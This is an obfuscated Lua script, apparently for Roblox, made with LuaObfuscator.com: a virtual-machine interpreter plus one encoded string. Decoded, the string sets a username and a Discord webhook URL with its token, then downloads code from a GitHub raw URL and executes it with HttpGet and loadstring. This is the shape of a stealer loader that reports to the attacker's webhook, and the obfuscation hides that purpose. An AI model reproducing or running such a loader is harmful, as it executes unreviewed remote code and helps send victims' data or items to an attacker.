--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v82,v19);v19=nil;v91=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(((3 -0) -1)^(v32-((1067 -(68 + 997)) -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v84-(v84%(1 + 0)) ;end end else local v85=(1 + (1271 -(226 + 1044)))^(v32-(878 -(282 + 595))) ;return (((v31%(v85 + v85))>=v85) and (1638 -(1523 + 114))) or (0 + (0 -0)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + (0 -0))) then return (v41 * (41190819 -24413603)) + (v40 * (156337 -90801)) + (v39 * (189 + 67)) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + ((12 -5) -3) ;v37=351 -(87 + 263) ;end end end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==(997 -(915 + 82))) then if (v46==((0 -0) -0)) then return v48 * (0 + (859 -(814 + 45))) ;else local v98=0 -0 ;while true do if (v98==(0 -0)) then v47=1188 -(1069 + 118) ;v45=0 -0 ;break;end end end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((793 -(368 + 423))^52))) ;end if (v42==(6 -4)) then v47=v20(v44,39 -(10 + 8) ,119 -88 );v48=((v20(v44,474 -(416 + 26) )==(3 -2)) and  -(1 + 0 + 0)) or (1 -0) ;v42=(156 + 285) -(145 + 293) ;end if (v42==(431 -(44 + 386))) then v45=1487 -(998 + 488) ;v46=(v20(v44,1 + (885 -(261 + 624)) ,(29 -12) + (1083 -(1020 + 60)) ) * ((774 -(201 + 571))^(1170 -(116 + 1022)))) + v43 ;v42=8 -6 ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1423 -(630 + 793))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v66=4 -3 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(3 + 0)) then else v59=nil;while true do local v93=0 + 0 ;while true do if (v93==(1 + 0)) then if (v53~=1) then else local v119=0 + 0 ;while true do if (1~=v119) then else local v142=0 -0 ;while true do if (v142==(0 -0)) then for v154=1,v58 do local v155=0 + 0 ;local v156;local v157;local v158;while true do if (v155==(0 -0)) then local v166=0;local v167;while true do if (0==v166) then v167=0 -0 ;while true do if (v167==(1385 -(746 + 638))) then v155=1 + 0 ;break;end if (v167==(0 + 0)) then local v171=0;while true do if ((0 -0)==v171) then v156=753 -(239 + 514) ;v157=nil;v171=1;end if (v171~=(1 + 0)) then else v167=342 -(218 + 123) ;break;end end end end break;end end end if (v155~=(1582 -(1535 + 46))) then else v158=nil;while true do if (v156~=(0 + 0)) then else local v168=0 + 0 ;local v169;while true do if ((560 -(306 + 254))==v168) then v169=0 + 0 ;while true do if (v169~=0) then else local v178=0 -0 ;while true do if (v178==(1468 -(899 + 568))) then v169=1;break;end if (v178==(0 + 0)) then v157=v21();v158=nil;v178=1203 -(373 + 829) ;end end end if ((2 -1)~=v169) then else v156=1131 -(369 + 761) ;break;end end break;end end end if (v156==(604 -(268 + 335))) then if (v157==(291 -(60 + 230))) then v158=v21()~=(572 -(426 + 146)) ;elseif (v157==(1 + 1)) then v158=v24();elseif (v157~=3) then else v158=v25();end v59[v154]=v158;break;end end break;end end end v57[1459 -(282 + 1174) ]=v21();v142=1;end if (v142==1) then v119=2;break;end end end if (v119==0) then v58=v23();v59={};v119=239 -(64 + 174) ;end if ((1 + 1)==v119) then v53=813 -(569 + 242) ;break;end end end break;end if (v93~=0) then else if ((5 -3)==v53) then local v120=0;local v121;while true do if (v120==(0 + 0)) then v121=0;while true do if (v121~=1) then else return v57;end if (v121==0) then for v159=1 + 0 ,v23() do local v160=0;local v161;local v162;local v163;while true do if (v160~=(1025 -(706 + 318))) then else v163=nil;while true do if (v161==1) then while true do if (v162==(1251 -(721 + 530))) then v163=v21();if (v20(v163,1,1)==(1271 -(945 + 326))) then local v172=0 -0 ;local v173;local v174;local v175;local v176;local v177;while true do if (v172==(1504 -(363 + 1141))) then local v179=1580 -(1183 + 397) ;while true do if (v179==1) then v172=2 -1 ;break;end if (v179==(0 + 0)) then v173=700 -(271 + 429) ;v174=nil;v179=1;end end end if (v172~=(1 + 0)) then else v175=nil;v176=nil;v172=2 + 0 ;end if ((1502 -(1408 + 92))==v172) then v177=nil;while true do if (v173~=(0 + 0)) then else local v180=1086 -(461 + 625) ;local v181;while true do if (v180==(1933 -(565 + 1368))) then v181=0 -0 ;while true do if (v181==(1661 -(1477 + 184))) then v174=1288 -(993 + 295) ;v175=nil;v181=1 + 0 ;end if (1==v181) then v173=1172 -(418 + 753) ;break;end end break;end end end if ((857 -(564 + 292))==v173) then local v182=0 + 0 ;while true do if ((1 -0)==v182) then v173=5 -3 ;break;end if ((304 -(244 + 60))==v182) then v176=nil;v177=nil;v182=1 + 0 ;end end end if (v173==(1 + 1)) then while true do if (v174==(478 -(41 + 435))) then local v183=0 + 0 ;local v184;while true do if (v183~=(0 + 0)) then else v184=529 -(406 + 123) ;while true do if (v184==(1126 -(936 + 189))) then v174=1772 -(1749 + 20) ;break;end if (v184==(1613 -(1565 + 48))) then local v194=0 + 0 ;while true do if (v194~=(0 + 0)) then else if (v20(v176,1323 -(1249 + 73) ,1 + 0 )~=(1146 -(466 + 679))) then else v177[2]=v59[v177[4 -2 ]];end if (v20(v176,2,2 -0 )==(1093 -(975 + 117))) then v177[8 -5 ]=v59[v177[3]];end v194=1901 -(106 + 1794) ;end if (v194~=(1 + 0)) then else v184=1 + 0 ;break;end end end end break;end end end if ((1 + 0)==v174) then local v185=0;local v186;local v187;while true do if (1==v185) then while true do if (0~=v186) then else v187=0 -0 ;while true do if (v187~=(0 -0)) then else local v195=114 -(4 + 110) ;local v196;while true do if (v195==(584 -(57 + 527))) then v196=1427 -(41 + 1386) ;while true do if (v196==(2 -1)) then v187=104 -(17 + 86) ;break;end if (v196==(0 + 0)) then v177={v22(),v22(),nil,nil};if (v175==(166 -(122 + 44))) then local v201=0 -0 ;local v202;local v203;while true do if (v201==(0 -0)) then v202=0 + 0 ;v203=nil;v201=1 + 0 ;end if ((1 -0)==v201) then while true do if (v202==(65 -(30 + 35))) then v203=611 -(602 + 9) ;while true do if ((0 + 0)==v203) then v177[3]=v22();v177[1193 -(449 + 740) ]=v22();break;end end break;end end break;end end elseif (v175==(1258 -(1043 + 214))) then v177[11 -8 ]=v23();elseif (v175==(1214 -(323 + 889))) then v177[9 -6 ]=v23() -(2^(42 -26)) ;elseif (v175==(583 -(361 + 219))) then local v206=320 -(53 + 267) ;while true do if (v206==(0 + 0)) then v177[1901 -(260 + 1638) ]=v23() -((442 -(382 + 58))^(51 -35)) ;v177[417 -(15 + 398) ]=v22();break;end end end v196=1;end end break;end end end if (v187==(1 + 0)) then v174=984 -(18 + 964) ;break;end end break;end end break;end if (v185==(0 -0)) then v186=1205 -(902 + 303) ;v187=nil;v185=1;end end end if ((0 + 0)==v174) then local v188=0 + 0 ;local v189;local v190;while true do if (v188~=(850 -(20 + 830))) then else v189=0 + 0 ;v190=nil;v188=127 -(116 + 10) ;end if (v188~=(1 + 0)) then else while true do if ((0 + 0)~=v189) then else v190=1690 -(1121 + 569) ;while true do if (v190~=1) then else v174=1;break;end if (v190==(214 -(22 + 192))) then v175=v20(v163,2,741 -(542 + 196) );v176=v20(v163,687 -(483 + 200) ,1469 -(1404 + 59) );v190=1 -0 ;end end break;end end break;end end end if (v174==(1 + 2)) then if (v20(v176,2 + 1 ,2 + 1 )==(2 -1)) then v177[4]=v59[v177[4]];end v54[v159]=v177;break;end end break;end end break;end end end break;end end break;end if (v161~=(0 -0)) then else v162=0;v163=nil;v161=1;end end break;end if ((0 -0)~=v160) then else v161=0 -0 ;v162=nil;v160=1552 -(1126 + 425) ;end end end for v164=406 -(118 + 287) ,v23() do v55[v164-1 ]=v28();end v121=3 -2 ;end end break;end end end if (v53==0) then v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1122 -(118 + 1003) ;end v93=1 + 0 ;end end end break;end if (v52==(4 -2)) then local v89=0 -0 ;while true do if ((1 + 0)==v89) then v52=380 -(142 + 235) ;break;end if ((0 -0)~=v89) then else v57=nil;v58=nil;v89=4 -3 ;end end end if (0~=v52) then else local v90=0 + 0 ;while true do if (v90==(0 -0)) then v53=0 + 0 ;v54=nil;v90=978 -(553 + 424) ;end if (v90==(1 + 0)) then v52=1;break;end end end if ((1 -0)==v52) then v55=nil;v56=nil;v52=2;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then local v99;local v100,v101;local v102;local v103;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v103=v80[2];v102=v78[v80[3]];v78[v103 + 1 ]=v102;v78[v103]=v102[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v103=v80[2];v100,v101=v71(v78[v103](v13(v78,v103 + 1 ,v80[3])));v73=(v101 + v103) -1 ;v99=0;for v122=v103,v73 do local v123=0;while true do if (v123==0) then v99=v99 + 1 ;v78[v122]=v100[v99];break;end end end v72=v72 + 1 ;v80=v68[v72];v103=v80[2];v78[v103]=v78[v103](v13(v78,v103 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81==1) then do return;end else local v127=0;local v128;while true do if (v127==0) then v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));break;end end end elseif (v81<=3) then v62[v80[3]]=v78[v80[2]];elseif (v81==4) then v78[v80[2]]=v62[v80[3]];else v78[v80[2]]=v80[3];end elseif (v81<=8) then if (v81<=6) then local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v124=v115,v73 do v118=v118 + 1 ;v78[v124]=v116[v118];end elseif (v81==7) then v78[v80[2]]();else local v133=0;local v134;local v135;while true do if (v133==0) then v134=v80[2];v135=v78[v80[3]];v133=1;end if (v133==1) then v78[v134 + 1 ]=v135;v78[v134]=v135[v80[4]];break;end end end elseif (v81<=10) then if (v81>9) then v72=v80[3];else v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81>11) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v80[3]~=0 ;end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203093O0072616765726F636B32030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4153544F52534352495054532F4153544F522F6D61696E2F4153544F5203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135303331303237383138313936312O37382F6870385552316E37364D6A5A4755514454726B3844435F535A4A594E3345556C484372654379437837553447482D4150434262722O71753730797748777869774B79686100173O0012053O00013O00260C3O000E0001000200040A3O000E0001001205000100043O00122O000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100260C3O00010001000100040A3O00010001001205000100043O001209000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
